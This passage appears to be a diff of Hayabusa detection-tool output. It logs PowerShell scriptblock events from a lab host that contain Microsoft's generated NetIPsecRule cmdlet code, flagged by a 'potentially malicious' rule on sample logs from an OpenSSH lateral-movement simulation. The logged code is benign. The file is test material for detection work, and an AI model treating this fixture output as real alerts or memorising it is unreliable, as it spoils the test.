$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPh",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 